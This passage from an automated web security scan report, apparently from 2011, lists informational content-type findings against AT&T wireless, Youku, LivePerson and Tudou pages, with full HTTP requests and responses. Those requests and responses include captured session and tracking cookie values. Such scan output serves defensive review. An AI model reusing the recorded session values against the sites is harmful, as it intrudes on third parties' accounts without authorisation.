The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /cell-phone-service/images/cart/btn_close.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 559
Last-Modified: Wed, 30 May 2007 01:28:21 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Cache-Control: max-age=900
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: DL3K=CT; expires=Mon, 12-Sep-2011 18:19:20 GMT; path=/; domain=www.wireless.att.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.............;..J....gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....J.A.......A...&.A...G.;..9. ....5.W.M.gPc....b&.nI.`f..n...."...tQ]_.U5=...\...`.v...c.[.T.Ne.Y...d:.
...[SNIP]...

20.52. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 09 Aug 2011 22:05:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 6614
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: TLTHID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTSID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTUID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:20 GMT
Set-Cookie: BIGipServerpWL_7010_7011=248631687.25115.0000; path=/

GIF89a_...................................l..............=;;pw.ECB...............JKL-+)QRT...............R]/.....422,.....%#"=Js\\].........cbd...zzy.........srr...............lji......X......
   ...`
...[SNIP]...

20.53. http://www.wireless.att.com/navservice/navservlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /navservice/navservlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /navservice/navservlet?locale=en_US HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; fsr.a=1313432472423; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%7D%7D; __utmc=241758596

Response

HTTP/1.1 200 OK
Server: Apache
Access-Control-Allow-Origin: *
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 79130
Date: Mon, 15 Aug 2011 18:20:16 GMT
Connection: close

[{"id":"p2001","url":"http://www.att.com/shop/index.jsp","displayName":
"SHOP","code":"010000","isHead":false,"image":"","windowLocation":"N",
"specialTreatment":"","advanced":"","actionType":
...[SNIP]...

20.54. http://www.youku.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youku.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.youku.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 09 Mar 2011 10:31:52 GMT
ETag: "19010-1aae-49e0a3cb1f600"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 6830
Date: Mon, 15 Aug 2011 18:51:07 GMT
Age: 105
Connection: keep-alive
X-Cache: Hit on a05.www

..............h...6......... .h....... .... ......
..(....... ....................................d
..k..a...p0..{@.......)...-...3...?....FJ...........9...(...O..@G..@I..KS..SZ..W]..]`..cg..`i..ju
...[SNIP]...

21. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


21.1. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=inPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/free-packages.jsp%3Fsource%3DECWD000000000000O&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313431960956&javaSupport=true&id=8278613948&scriptVersion=1.1&d=1313432396119&cobrowse=true&cookie=TLTUID%3D7284D2A8C16210C1695BC3E02554C7F2%3B%20ECOM_GTM%3DNA_osbth%3B%20cust_type%3Dnew%3B%20browserid%3DA001693504923%3B%20svariants%3DNA%3B%20DL3K%3D3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg%3B%2000d78e1f-01f0-45cd-9f9c-79e690335b05%3D%257B%2522parent_id%2522%253A%2522kwkf9w9SRba%2522%252C%2522referrer%2522%253A%2522http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%2522%252C%2522id%2522%253A%2522uo_OgfisI0f%2522%252C%2522wom%2522%253Atrue%252C%2522entry_point%2522%253A%2522http%253A%252F%252Fwww.wireless.att.com%252Fcell-phone-service%252Fcell-phones%252Fcell-phones.jsp%253Ffeacondition%253Dallphones%2526feaavailable%253Dallphones%2526feapaytype%253Dstandard%2526startFilter%253Dfalse%2526allTypes%253Don%2526osWindows%252520Phone%253D100012%2526allManus%253Don%2526source%253DECWD000000000000O%2523fbid%25253Dkwkf9w9SRba%2526migAtlSA%253D341465538%2526migAtlC%253D480d7815-42e6-4315-a737-64cdf14f8adc%2522%252C%2522url_tag%2522%253A%2522NOMTAG%2522%257D%3B%20bn_u%3D6923670900791695274%3B%20__utma%3D52846072.1104250127.1312768993.1312768993.1312768993.1%3B%20__utmz%3D52846072.1312768993.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20__utma%3D241758596.1378329856.1312769231.1312769231.1313431966.2%3B%20__utmz%3D241758596.1313431966.2.2.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20TLTHID%3D0ADE256AC76A10C7A712DC7C2E9C4CD7%3B%20TLTSID%3D04A9E9E0C76A10C798F7CEF5BD5C2DB8%3B%20DYN_USER_ID%3D4148411862&title=Free%2&referrer= HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; HumanClickSiteContainerID_76226072=Master; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313431908597

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:19:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a(............,...........L.;

21.2. http://stat.tudou.com/newstat/pv  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stat.tudou.com
Path:   /newstat/pv

Request

GET /newstat/pv?s=1~_~bl9jp2sf91i~_~http%3A%2F%2Fwww.tudou.com%2F~_~~_~1~_~1313434616952~_~0~_~14&_=1313434616957 HTTP/1.1
Host: stat.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 15 Aug 2011 18:56:26 GMT
X-Cache: MISS from stat.tudou.com
Server: Apache
Content-Length: 47

pageUUID="bd85057c-8db6-4279-93af-98a0477e4a8b"

Report generated by XSS.CX at Mon Aug 15 13:25:29 GMT-06:00 2011.